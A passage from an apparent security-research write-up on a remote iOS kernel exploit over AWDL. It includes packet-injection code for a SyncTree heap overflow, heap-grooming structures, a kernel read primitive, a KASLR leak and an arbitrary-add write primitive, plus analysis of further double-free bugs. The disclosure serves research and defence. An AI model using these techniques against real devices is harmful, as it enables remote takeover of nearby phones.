       DATAPATH(reader_peer),

       SYNC_TREE((struct ether_addr*)overflower,

                  sizeof(overflower)/sizeof(struct ether_addr)),

       PKT_END());


There are two important parts to this frame:


1) We've included a SyncTree TLV which will trigger the buffer overflow. SYNC_TREE will copy the MAC addresses in overflower into the sync_tree_macs inline buffer in the IO80211AWDLPeer:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


sync_tree_macs is at offset +0x1648 in the IO80211AWDLPeer object and the steering_msg_blob is at +0x1698, so by placing our arbitrary read target 0x50 bytes into the SYNC_TREE TLV we'll overwrite the steering_msg_blob, in this case with the value 0x4141414141414141.


2) The other important part is that we no longer send the CHAN_SEQ_EMPTY TLV, meaning this peer will use the channel sequence in the sync_params TLV. This contains a channel sequence where the peer declares they are listening in every Availability Window (AW), meaning that the next time the UMI timer fires while the target device is also in an AW it will read the corrupted steering_msg_blob pointer and try to build a UMI using it. If we sniff for UMI frames coming from the target MAC address (dst in this example) and parse out TLV 0x1d we'll find our (almost) arbitrarily read memory!


In this case of course trying to read from an address like 0x4141414141414141 will almost certainly cause a kernel panic, so we've still got more work to do.

Almost-arbitrary read

There are some important limitations for this read technique: firstly, the steering_msg_blob has its length as the second dword member and that length will be used as the length of memory to copy into the UMI. This means that we can only read from places where the second dword pointed to is a small value less than around 800 (the available space in the UMI frame.) That size also dictates how much will be read. We can work with this as an initial arbitrary read primitive however.


The second limitation is the speed of these reads; in order to steer multiple peers at the same time and therefore perform multiple reads in parallel we'll need some more tricks. For now, the only option is to wait for steering to fail and restart the steering process. This takes around 8 seconds, after which the steering process can be restarted by using a steeringMsgId value of 0 rather than 6 in the BSS_STEERING TLV.

What to read

At this point we can get memory sent back to us provided it meets some requirements. Helpfully, if the memory doesn't meet those requirements then, as long as the virtual address is mapped and readable, the code won't crash, so we have some leeway.


My first idea here was to use the physmap, an (almost) 1:1 virtual mapping of the physical address space in virtual memory. The base address of the physmap is randomized on iOS but the slide is smaller than the physical address space size, meaning there's a virtual address in there you can always read from. This gives you a safe virtual address to dereference to start trying to find pointers to follow.


It was around this point in the development of the exploit that Apple released iOS 13.3.1 which patched the heap overflow. I wanted to also release at least some kind of demo at this point so I released a very basic proof-of-concept which drove the BSS Steering state machine far enough to read from the physmap along with a little javascript snippet you could run in Safari to spray physical memory to demonstrate that you really were reading user data. Of course, this isn't all that compelling; the more compelling demo is still a few months down the road.


Discussing these problems with fellow Project Zero researchers Brandon Azad and Jann Horn, Brandon mentioned that on iOS the base of the zone map, used for most general kernel heap allocations, wasn't very randomized at all. I had looked at this using DTrace on MacOS and it seemed fairly randomized, but dumping kernel layout information on iOS isn't quite as trivial as setting a boot argument to disable SIP and enable kernel DTrace.


Brandon had recently finished the exploit for his oob_timestamp bug and as part of that he'd made a spreadsheet showing various values such as the base of the zone and kalloc maps across multiple reboots. And indeed, the randomization of the base of the zone map is very minimal, around 16 MB:


kASLR       sane_size   zone_min            zone_max
04da4000    72fac000    ffffffe000370000    ffffffe02b554000
080a4000    73cac000    ffffffe0007bc000    ffffffe02be80000
08b28000    73228000    ffffffe00011c000    ffffffe02b3ec000
0bbb0000    721a4000    ffffffe0005bc000    ffffffe02b25c000
0c514000    7383c000    ffffffe000650000    ffffffe02bb68000
0d4d4000    72880000    ffffffe0002d8000    ffffffe02b208000
107d4000    7357c000    ffffffe00057c000    ffffffe02b98c000
12c08000    73148000    ffffffe000598000    ffffffe02b814000
13fb8000    71d98000    ffffffe000714000    ffffffe02b230000
184fc000    73854000    ffffffe00061c000    ffffffe02bb3c000


Using the Service Response Descriptor TLV technique we can allocate 16MB of memory in just a handful of frames, which means we should stand a reasonable chance of being able to safely find our allocations on the heap.
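
As a rough back-of-the-envelope check: covering the ~16MB of zone map slide with 16KB SRD allocations needs on the order of a thousand allocations, and at 39 SRD TLVs per injected frame (the spray layout described below) that's fewer than 30 frames.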

Finding ourselves

What would we like to read? We've discussed before that in order to safely corrupt the fields after the vtable in the IO80211AWDLPeer object we'll need to know a PAC'ed vtable pointer so we'd like to read one of those. If we're able to find one of those we'll also know the address of at least one IO80211AWDLPeer object.


If you make enough allocations of a particular size in iOS they will tend to go from lower addresses to higher addresses. Apple has introduced various small randomizations into exactly how objects are allocated but they're not relevant if we just examine the overall trend, which is to try to fill the virtual memory area reserved for the zone map from bottom to top.


As the maximum slide value of the zone map is smaller than its size there will be a virtual address which is always inside the zone map


The insufficient randomization of the zone map base gives us quite a large virtual memory region I've dubbed the safe probe region where, provided we go approximately from low to high, we can safely read.


Our heap groom is as follows:


We send a large number of service_response TLVs, each of which has the following form:


struct service_response_16k_id_tlv sr = {0};

 

sr.type = 2;

sr.len = sizeof(struct service_response_16k_id_tlv) - 3;

sr.s_1 = 2;

sr.key_buf[0] = 'A';

sr.key_buf[1] = 'B';

sr.v_1 = 0x4000;

sr.v_2 = 0x1648; // offset

sr.val_buf[0] = 6;  // msg_id

sr.val_buf[1] = 0x320; // msg_len

sr.val_buf[2] = 0x41414141; // marker

sr.val_buf[3] = val; // counter


Each of these TLVs causes the target device to make a 16KB kalloc allocation (one physical page) and then at offset +0x1648 in there write the following 4 dwords:


6

0x320

0x41414141

counter


The counter value increments by one for each TLV we send.


We put 39 of these TLVs in every frame which will result in the allocation of 39 physical pages, or over 600kb, for each AWDL frame we send, allowing us to rapidly allocate memory.


We split the groom into three sections, first sending a number of these spray frames, then a number of spoofed peers to cause the allocation of a large number of IO80211AWDLPeer objects. Finally we send another large number of the service response TLVs.


This results in a memory layout approximating this:


Inside the safe probe region we aim to place a number of IO80211AWDLPeer objects, surrounded by service_response groom pages with approximately incrementing counter values


If we now use the BSS Steering arbitrary read primitive to read from near the bottom of the safe probe region at offset +0x1648 from page boundaries, we should hopefully soon find one of the service_response TLV buffers. Since each service_response groom contains a unique counter which we can then read, we can make a guess for the distance between this discovered service_response buffer and the middle of where we think target peers will be and so compute a new guess for the location of a target peer. This approach lets us do something like a binary search to find an IO80211AWDLPeer object reasonably efficiently.
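
Sketched as code, the probing loop looks something like this. steering_read stands in for one round of the BSS steering read primitive, and the constants and result layout are illustrative stand-ins, not the exploit's real values:

#include <stdint.h>

// Illustrative placeholders, not real values from the exploit:
#define SAFE_PROBE_REGION_BASE    0xffffffe000800000ULL  // low end of the safe probe region
#define PEER_SPRAY_MIDDLE_COUNTER 5000                   // counter sprayed nearest the peers
#define PROBE_STEP                0x100000ULL            // fallback step if nothing is recognised

struct probe_result { uint32_t magic; uint32_t counter; };

// One round of the BSS steering read primitive (hypothetical wrapper around
// the steering/overflow/UMI-sniffing dance described above).
struct probe_result steering_read(uint64_t kaddr);

uint64_t find_peer(void) {
  uint64_t guess = SAFE_PROBE_REGION_BASE + 0x1648;  // page boundary + spray offset
  for (;;) {
    struct probe_result r = steering_read(guess);    // roughly 8 seconds per read
    if (r.magic == 0x43434343)                       // peer_fake_steering_blob marker: found a peer
      return guess - 0x1648;                         // base of an IO80211AWDLPeer
    if (r.magic == 0x41414141) {                     // service_response spray marker
      // the counter tells us roughly how many 16KB allocations we are away
      // from the middle of the peer spray, so jump accordingly
      int64_t pages = (int64_t)PEER_SPRAY_MIDDLE_COUNTER - (int64_t)r.counter;
      guess += pages * 0x4000;
    } else {
      guess += PROBE_STEP;                           // unknown memory; keep walking upwards
    }
  }
}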


Why did I choose to read from offset +0x1648? Because that's also the offset of the sync_tree_macs buffer in the IO80211AWDLPeer where we can place arbitrary data. Each of those middle target peers is created like this:


struct peer_fake_steering_blob {

  uint32_t msg_id;

  uint32_t msg_len;

  uint32_t magic; // 0x43434343 == peer

  struct ether_addr mac; // the MAC of this peer

  uint8_t pad[32];

} __attribute__((packed));

 

struct peer_fake_steering_blob fake_steerer = {0};

 

fake_steerer.msg_id = 6;

fake_steerer.msg_len = 0x320;

fake_steerer.magic = 0x43434343;

fake_steerer.mac = target_groom_peer;

 

inject(RT(),

  WIFI(dst, target_groom_peer),

  AWDL(),

  SYNC_PARAMS(),

  SERV_PARAM(),

  HT_CAPS(),

  DATAPATH(target_groom_peer),

  SYNC_TREE((struct ether_addr*)&fake_steerer,

            sizeof(struct peer_fake_steering_blob)

              /sizeof(struct ether_addr)),

  PKT_END());


The magic value 0x43434343 lets us determine whether our read has found a service_response buffer or a peer. Following that we put the spoofed MAC address of this peer. This allows us to determine which peer has the address we guessed. If we do manage to find a peer allocation we can then examine the remaining bytes of disclosed memory; there's a high probability that following this peer is another peer, and we've disclosed the first few dozen bytes of it. Here's a hexdump of a successfully located peer:


An annotated hexdump of the disclosed memory when two neighbouring IO80211AWDLPeer objects are found. Here you can see the runtime values of the fields in the peer header, including the PAC'ed vtable pointer


We can see here that we have managed to find two peers next to each other. We'll call these lower_peer and upper_peer. By placing each sprayed peer's MAC address in the sync_tree_macs array we're able to determine both lower_peer and upper_peer's MAC address. Since we know which guessed virtual address we chose we also know the virtual addresses of lower_peer and upper_peer, and from the PAC'ed vtable pointer we can compute the KASLR slide.
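
That last step can be sketched as follows; the unslid vtable address would come from the static kernelcache, and both it and the upper-bit mask used to strip the PAC are placeholder assumptions here (the exact mask depends on the device's kernel virtual address configuration):

#include <stdint.h>

// Placeholder: unslid address of the IO80211AWDLPeer vtable, as read from the
// static kernelcache. Illustrative value only.
#define IO80211AWDLPEER_VTABLE_UNSLID 0xfffffff0076a0000ULL

// The leaked vtable pointer has a PAC in its upper bits; re-extend the kernel
// address bits to recover the raw pointer. The mask is an assumption.
static uint64_t strip_pac(uint64_t signed_ptr) {
  return signed_ptr | 0xfffffff000000000ULL;
}

static uint64_t kaslr_slide_from_leak(uint64_t leaked_vtable_ptr) {
  return strip_pac(leaked_vtable_ptr) - IO80211AWDLPEER_VTABLE_UNSLID;
}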


From now on we can easily and repeatedly corrupt the fields seen above by sending a large sync tree TLV containing a modified version of this dumped memory:


Using the disclosed memory we can safely manipulate the lower fields in upper_peer using the SyncTree buffer overflow

A mild panic?

Accidental 0day 1 of 2

During my experiments to get the BSS Steering state machine working and into the desired state where it would send UMIs, I noticed that the target device would sometimes kernel panic, even when I was very sure that I hadn't triggered the heap overflow vulnerability. As it turns out, I was accidentally triggering another zero-day vulnerability...


oops!


This was slightly concerning as it had now been months since I had reported the first AWDL-based vulnerability to Apple and a fix for that had already shipped. One of my early hopes for Project Zero was that we could have a "research amplification" effect: we would invest significant effort in publicly less-understood areas of vulnerability research and exploitation and present our results to the affected vendors who would then use their significantly greater resources to continue this research. Vendors have resources such as source code and design documents which should make it vastly easier to audit many of these attack surfaces - we would be keen to assist in this second phase as well.


A more pragmatic view of reality is that whilst the security and product teams do want to continue our research, and do have many more resources, the one important resource they lack is time. Justifying the benefits of fixing a vulnerability which will become public in 90 days is easy but extracting the maximum value from that external report by investing a significant amount of time is much harder to justify; these teams already have other goals and targets for the quarter. Time is the key resource which makes Project Zero successful; we don't have to do vulnerability triage, or design review, or fix bugs or any of the other things typical product security teams have to do.


I mention this because I stumbled over (and reported to Apple) not one but two more remotely-exploitable radio-proximity 0-day vulnerabilities during this research, the first of which appears to have been at least on some level known about:



Mark Dowd is the co-founder of Azimuth, an Australian "market-leading information security business". 


It's well known to all vulnerability researchers that the easiest way to find a new vulnerability is to look very closely at the code near a vulnerability which was recently fixed. They are rarely isolated incidents and usually indicate a lack of testing or understanding across an entire area.


I'm emphasising this point because Mark Dowd's tweet above is claiming knowledge of a variant that wasn't so difficult to find. One that was so easy to find, in fact, that it falls out by accident if you make the slightest mistake when doing BSS Steering. 


We saw the function IO80211AWDLPeer::populateBssSteeringMsgBlob earlier; it's responsible for allocating and populating the steering_msg_blob buffer which will end up as the contents of the 0x1d TLV sent in a AWDL BSS Steering UMI.


At the beginning of the function they check whether this peer already has a steering_msg_blob:


if (this->steering_msg_blob && this->steering_msg_blob_size) {

  ...

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

}


If it does have one it gets free'd and NULL-ed out.


They then compute the size of the new steering_msg_blob, allocate it and fill it in:


steering_blob_size = *(_DWORD *)(msg + 0x3C) + 0x4F;

this->steering_msg_blob = kalloc(steering_blob_size);

...

this->steering_msg_blob_size = steering_blob_size;


All ok.


Right at the end of the function they then try to add the peer to the "UMI chain" - this is the other linked list of peers with pending UMIs which we saw earlier:


err = 0;

if (this->addPeerToUmiChain()) {

  if ( peer_manager

      && peer_manager->isSafeToSendUmiNow(

  this->chanseq_channels[peer_manager->current_chanseq_step + 1],0)) {

    err = 0;

    // in a shared AW; force UMI timer to expire now

    peer_manager->UMITimer->setTimeoutMS(0);

  }

} else {

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);
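  // note: unlike the kfree at the start of the function, steering_msg_blob is not set back to NULL here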

  this->UMI_feature_mask = 0;

  err = 0xE00002BC;

}

return err;


If the peer gets successfully added to the UMI chain, they test whether they could send the UMI right now (if both this device and the target are in AW's on the same channel). If so, they force the UMI timer to expire, which triggers the code we saw earlier to read the steering_msg_blob, build the UMI template and send it.


However, if addPeerToUmiChain fails then the steering_msg_blob is freed. But unlike the earlier kfree, this time they don't NULL out the pointer before returning. The vulnerability here is that that field is expected to be the owner of that allocation; so if we can somehow come back into populateBssSteeringMsgBlob again this same value will be freed a second time.


There's an even easier way to trigger a double-kfree however: by doing nothing.


After a period of inactivity the IO80211AWDLPeer object will be destructed and free'd. As part of that the IO80211AWDLPeer::freeResources will be called, which does this:


steering_msg_blob = this->steering_msg_blob;

if ( steering_msg_blob ) {

  kfree(steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

  this->steering_msg_blob_size = 0;

}


This will see a value for steering_msg_blob which has already been freed and free it a second time. If an attacker were able to reallocate the buffer in between the two frees they could get that controlled object freed, leading to a use-after-free.


It actually took some reversing effort to work out how to make addPeerToUmiChain not fail. The trick is that the peer needs to have sent a datapath TLV with the 0x800 flag set in the first dword, and that's why we set that flag.


This vulnerability also opens a different possibility for the initial memory disclosure. By steering multiple peers it's possible to use this to construct a primitive where the target device will attempt to send a UMI containing memory from a steering_msg_blob which has been freed. With some heap grooming this could allow the disclosure of both a stale allocation as well as out-of-bounds data without needing to guess pointers. In the end I chose to stay with the low zone_map entropy technique as I also wanted to try to land this remote kernel exploit using only a single vulnerability.


We'll get back to the exploit now and take a look at accidental 0day 2 of 2 later on...

The path to a write

We've seen that the peer objects seem to be accessed frequently in the background, not just when we're sending frames. This is important to bear in mind as we search for our next corruption target.


One option could be to use the arbitrary free primitive. Maybe we could free a peer object but this would be tricky as the memory allocator would write metadata over the vtable pointer and the peer might be used in the background before we got a chance to ensure it was safe.


Another possibility could be to cause a type confusion. It's possible that you could find a useful gadget with such a primitive but I figured I'd keep looking for something else.


At this point I started going through more AWDL code looking for all indirect writes I could find. Being able to write even an uncontrolled value to an arbitrary address is usually a good stepping-stone to a full arbitrary memory write primitive.


There's one indirect write which stood out as particularly interesting; right at the start of IO80211AWDLPeer::actionFrameReport:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;

  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if ( frames_in_last_second >= 0x21 )

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }

  ... // continue on to parse the frame


Those first three lines of the decompiler output are exactly the kind of indirect write we're looking for:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;


The peer_manager field is at offset +0x28 in the peer object, easily corruptible with the linear overflow. The total_bytes_received field is a u32 at offset +0x7c80 in the peer manager, and frame_len is the length of the WiFi frame we send so we can set this to an arbitrary value, albeit at least 0x69 (the minimum AWDL frame size) and less than 1200 (potentially larger with fragmentation but it wouldn't help much). That arbitrary value would then get added to the u32 at offset +0x7c80 from the peer_manager pointer. This would be enough to do a byte-by-byte write of arbitrary memory, presuming you knew what was there before:


By corrupting upper_peer's peer_manager pointer then spoofing a frame from upper_peer we can cause an indirect write through the corrupted peer_manager pointer. The peer_manager has a dword field at offset +0x7c80 which counts the total number of bytes received from all peers; actionFrameReport will add the length of the frame spoofed from upper_peer to the dword at the corrupted peer_manager pointer + 0x7c80 giving us an arbitrary add primitive


We do have a limited read primitive already, probably enough to bootstrap ourselves to a full arbitrary read and therefore full arbitrary write. We can indeed reach this code with a corrupted peer_manager pointer and get an arbitrary add primitive. There's just one tiny problem, which will take many more weeks to solve: We'll panic immediately after the write.

Getting the timing right

Although the IO80211AWDLPeer's peer_manager field doesn't appear to be used often in the background (unlike the vtable), it will be used again later on in the actionFrameReport method, and since we're trying to write to arbitrary addresses that later use will almost certainly cause a panic.


Looking at the code, there is only one safe path out of actionFrameReport:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if (frames_in_last_second >= 0x21)

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We have to reach that return 0 statement, which means we need the first if clause to be false, and the second one to be true.


The first statement checks whether more than 1024 ms have elapsed since the per_second_timestamp was updated.


The second statement checks whether more than 32 frames have been received since the per_second_timestamp was last updated.


So to reach the return 0 and avoid the panics due to an invalid peer_manager pointer, we'd need to ensure that at least 32 frames have already been received from the same spoofed peer within a 1024ms window before the frame which triggers the write.


You are hopefully starting to see why the ACK-sniffing model is so much more useful here than the timing model: if the target had only received 31 frames then attempting the arbitrary add would cause a kernel panic.


Recall that at this point however I'm using a 2.4GHz-only WiFi adaptor for injection and monitoring and the only data rate I can get to work is 1Mbps. Actually getting 33 frames onto the air inside 1024ms, especially as only a fraction of that time will be AWDL Availability Windows, is probably impossible.


Furthermore, as I suddenly need far more accuracy in terms of knowing whether frames were received or not, I start to notice how unreliable my monitor device is. It appears to be frequently dropping frames, with an error rate seemingly positively correlated with how long the adaptor has been plugged in. After a while my testing routine includes unplugging the injection and monitoring adaptors after each test to let them cool down. This hopefully gives a taste of how frustrating many parts of this exploit development process were. Without a stable and fast testing setup, prototyping ideas is painfully slow, and evaluating failures is even harder because you never know whether the idea itself didn't work or whether it was yet another hardware failure.

Changing the clocks

It's probably impossible to make the timing checks pass using intended behaviour with the current setup. But we still have a few tricks up our sleeve. We do have a memory corruption vulnerability after all.


Looking at the two relevant fields per_second_timestamp and n_frames_in_last_second we notice that they're at the following offsets:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


So the timestamp (which is absolute, not relative) and the frame count sit just after the sync tree buffer which we can overflow out of, meaning we can reliably corrupt them and provide a fake timestamp and count.
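
To make that concrete, here's a minimal sketch of what such an overflow payload could look like. The offsets come from the structure layout above; the surrounding frame-building code (the SyncTree TLV itself) is omitted, the helper is purely illustrative, and in practice the overflow is sent as a whole number of 6-byte ether_addr entries, as in the exploit code shown later in this post:

#include <stdint.h>
#include <string.h>

// Offsets relative to the start of the sync_tree_macs buffer at +0x1648,
// taken from the layout above.
#define TS_OFF   (0x1688 - 0x1648)   // per_second_timestamp: +0x40 into the overflow
#define CNT_OFF  (0x1690 - 0x1648)   // n_frames_in_last_second: +0x48 into the overflow

// Build a SyncTree payload which overflows just far enough within the same
// peer to plant a fake timestamp and a large frame counter.
void build_timestamp_overflow(uint8_t out[128], uint64_t fake_ts, uint32_t big_count) {
  memset(out, 0, 128);
  memcpy(out + TS_OFF,  &fake_ts,   sizeof(fake_ts));
  memcpy(out + CNT_OFF, &big_count, sizeof(big_count));
}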


Arbitrary add idea 1: clock synchronization

My first idea was to try to determine the delta between the target device's absolute clock and the raspberry pi running the exploit. Then safely triggering an arbitrary add would be a three step process:


1) Compute a valid per_second_timestamp value at a point just in the future and do a short overflow within upper_peer to give it that arbitrary timestamp and a high n_frames_in_last_second value.


2) Do a long overflow from lower_peer to corrupt upper_peer's peer_manager pointer to point 0x7c80 bytes below the arbitrary add target.


3) Spoof a frame from upper_peer where the length corresponds to the size of the arbitrary add. As long as the timestamp we wrote in step 1 is less than 1024 ms earlier than the target device's current clock, and the n_frames_in_last_second is still large, we'll hit the early error return path.


To pull this off we'll need to synchronize our clocks. AWDL itself is built on accurate timing and there are timing values in each AWDL frame. But they don't really help us that much because those are relative timestamps whereas we need absolute timestamps.


Luckily we already have a restricted read primitive, and in fact we've already accidentally used it to leak a timestamp:


The same annotated hexdump from the initial read primitive when it found two neighbouring peers. At offset +0x43 in the dump we can see the per_second_timestamp value. We'd now like to leak one of these which we force to be set at an exact moment in time


We can use the initial limited arbitrary read primitive again under more controlled conditions to try to determine the clock delta like this:


1) Wait 1024 ms.


2) Spoof a frame from lower_peer, which will cause it to get a fresh per_second_timestamp.


3) When we receive an ACK, record the current timestamp on the raspberry pi.


4) Use the BSS Steering read to read lower_peer's timestamp.


5) Convert the two timestamps to the same units and compute the delta.
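
Step 5 is just bookkeeping, but it's worth spelling out. As a rough sketch, where tick_to_ns is a stand-in for whatever factor converts the target's mach_absolute_time ticks into nanoseconds (its exact value is device-specific and an assumption on my part):

#include <stdint.h>

// Delta between the target's clock and the pi's clock, both in nanoseconds.
int64_t compute_clock_delta(uint64_t leaked_ticks,   // lower_peer's leaked per_second_timestamp
                            uint64_t pi_ns_at_ack,   // pi clock when the spoofed frame was ACKed
                            uint64_t tick_to_ns) {
  return (int64_t)(leaked_ticks * tick_to_ns) - (int64_t)pi_ns_at_ack;
}

// A fake per_second_timestamp which the target should consider fresh at time
// pi_ns on the pi's clock.
uint64_t fake_timestamp_ticks(uint64_t pi_ns, int64_t delta_ns, uint64_t tick_to_ns) {
  return (uint64_t)((int64_t)pi_ns + delta_ns) / tick_to_ns;
}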


Now we can perform the arbitrary write as described above by using the SyncTree overflow inside upper_peer to give it a fake and valid per_second_timestamp and n_frames_in_last_second value. This works, and we can add an arbitrary byte to an arbitrary address!


Unfortunately it's not very reliable. There are too many things to go wrong here, and for a painful couple of weeks everything went wrong. Firstly, as previously discussed, the injection and monitoring hardware is just too unreliable. If we miss ACKs we end up getting the clock delta wrong, and if the clock delta is too wrong we'll panic the target. Also, we're still sending frames very slowly, and the slower this all happens the lower the probability that our fake timestamp stays valid by the time it's used. We need an approach which is going to work far more reliably.

More timing tricks

Having to synchronize the clocks is fragile. Looking more closely at the code, I realized there was another way to reach the error bail out path without manually syncing.


If we wait 1024ms then spoof a frame, the peer structure will get a fresh timestamp which will pass the timestamp check for the next 1024ms. 


We can't do that and then overflow into the n_frames_in_last_second field, because that field is after the per_second_timestamp so we'd corrupt it. But there is actually a way to corrupt the n_frames_in_last_second field without touching the timestamp:


1) Wait 1024ms then spoof a valid frame from upper_peer, giving its IO80211AWDLPeer object a valid per_second_timestamp.


2) Overflow from lower_peer into upper_peer, setting upper_peer's peer_manager pointer to 0x7c80 bytes before upper_peer's frames_in_last_second counter.


3) Spoof a valid frame from upper_peer.


Let's look more closely at exactly what will happen now:


It's now the case that this->peer_manager points 0x7c80 before peer->n_frames_in_last_second when IO80211AWDLPeer::actionFrameReport gets called on upper_peer:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);


Because we've corrupted upper_peer's peer_manager pointer, peer_manager->total_bytes_received overlaps with upper_peer->n_frames_in_last_second, meaning this add will add the frame length to upper_peer->n_frames_in_last_second! The important part is that this write happens before n_frames_in_last_second is checked!


  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;


And if we're fast enough we'll still pass this check, because we have a real timestamp:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

     ...

  }


and now we'll also pass this check and return:


  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We've now got a timestamp still valid for some portion of 1024ms and n_frames_in_last_second is very large, without having to send that many frames within the 1024ms window or having to manually synchronize the clocks.


The fourth step is then to overflow again from lower_peer to upper_peer, this time pointing peer_manager to 0x7c80 below the desired add target. Finally, spoof a frame from upper_peer, padded to the correct size for the desired add value.
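
Putting the whole sequence together, the primitive we end up with looks roughly like the sketch below. spoof_frame_from_upper_peer() and corrupt_upper_peer_manager() are hypothetical stand-ins for the exploit's real frame-building helpers; only the ordering, the offsets and the frame-length-as-addend trick come from the analysis above:

#include <stdint.h>
#include <unistd.h>

// Hypothetical stand-ins: spoof an AWDL action frame of a given length from
// upper_peer, and use the SyncTree overflow from lower_peer to overwrite
// upper_peer's peer_manager pointer.
void spoof_frame_from_upper_peer(uint32_t frame_len);
void corrupt_upper_peer_manager(uint64_t fake_peer_manager);

#define MIN_FRAME_LEN        0x69     // minimum AWDL frame size
#define N_FRAMES_OFFSET      0x1690   // n_frames_in_last_second in IO80211AWDLPeer
#define TOTAL_BYTES_OFFSET   0x7c80   // total_bytes_received in the peer manager

// Add `value` (which must be a representable frame length, roughly 0x69..1200)
// to the u32 at `target`.
void arbitrary_add(uint64_t upper_peer_kaddr, uint64_t target, uint32_t value) {
  sleep(2);                                                  // 1) let the previous window expire (>1024ms)...
  spoof_frame_from_upper_peer(MIN_FRAME_LEN);                //    ...then grab a fresh per_second_timestamp
  corrupt_upper_peer_manager(                                // 2) aim the add at upper_peer's own counter
      upper_peer_kaddr + N_FRAMES_OFFSET - TOTAL_BYTES_OFFSET);
  spoof_frame_from_upper_peer(MIN_FRAME_LEN);                // 3) the counter becomes huge
  corrupt_upper_peer_manager(target - TOTAL_BYTES_OFFSET);   // 4) aim at the real target
  spoof_frame_from_upper_peer(value);                        // 5) mbuf_len() == value; early "Bad Peer" return
}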

Another timing trick

The final timing trick for now was to realize we could skip the initial 1024ms wait by first overflowing within upper_peer to set its timestamp to 0. Then the next valid frame spoofed from upper_peer would be sure to set a valid per_second_timestamp usable for the next 1024 ms. In this way we can use the arbitrary write quite quickly, and start building our next primitive. Except...

I'm still panicking...

Earlier I accidentally discovered another exploitable zero-day. Fortunately it was fairly easy to avoid triggering it, but my exploit continued to panic the target device in a multitude of ways. Of course, as before, this was to be expected, and I worked out a few ways in which I was potentially causing panics.


One was that when I was overwriting the peer_manager pointer I was also overwriting the flink and blink pointers of the peer in the linked list of peers. If peers had been added or removed from the list since I had taken the copy of those pointers I could now be corrupting the list, potentially adding back stale pointers or altering the order. This was bound to cause problems so I added a workaround: I would ensure that no spoofed peers ever got freed. This is simple to implement; just ensure every peer spoofs a frame around every 20 seconds or so and you'll be fine.


But my test device was still panicking, so I decided to really dig into some of the panics and work out exactly what seems to be happening. Am I accidentally triggering yet another zero-day?

More accidental zero-day

After a day or so of analysis and reversing I realize that yes, this is in fact another exploitable zero-day in AWDL. This is the third, also reachable in the default configuration of iOS.


This vulnerability took significantly more effort to understand than the double free. The condition is more subtle and boils down to a failure to clear a flag. With no upfront knowledge of the names or purposes of these flags (and there are hundreds of flags in AWDL) it required a lot of painstaking reverse engineering to work out what's going on. Let's dive in.


resetAndRemovePeerInfo is a member method of the IO80211PeerBssSteeringManager. It's called when a peer is being destructed:


IO80211PeerBssSteeringManager::resetAndRemovePeerInfo(

  IO80211AWDLPeer *peer) {

 

  struct BssSteeringCntx *cntx;

 

  if (!peer) {

    // log error and return

  }

 

  peer->added_to_fw_cache = 0;

 

  cntx = this->steering_cntx;

 

  if (cntx->peer_count) {

    for (uint64_t i = 0; i < cntx->peer_count; i++) {

      if (memcmp(&cntx->peer_macs[i], &peer->peer_mac, 6uLL) == 0) {

        memset(&cntx->peer_macs[i], 0, 6uLL); 

      }

    };

  }

  cntx->peer_count--;

}


We can see a callsite here in IO80211AWDLPeerManager::removePeer:


if (peer->added_to_fw_cache) {

  if (this->steering_manager)  {

    this->steering_manager->resetAndRemovePeerInfo(peer);

  }

}


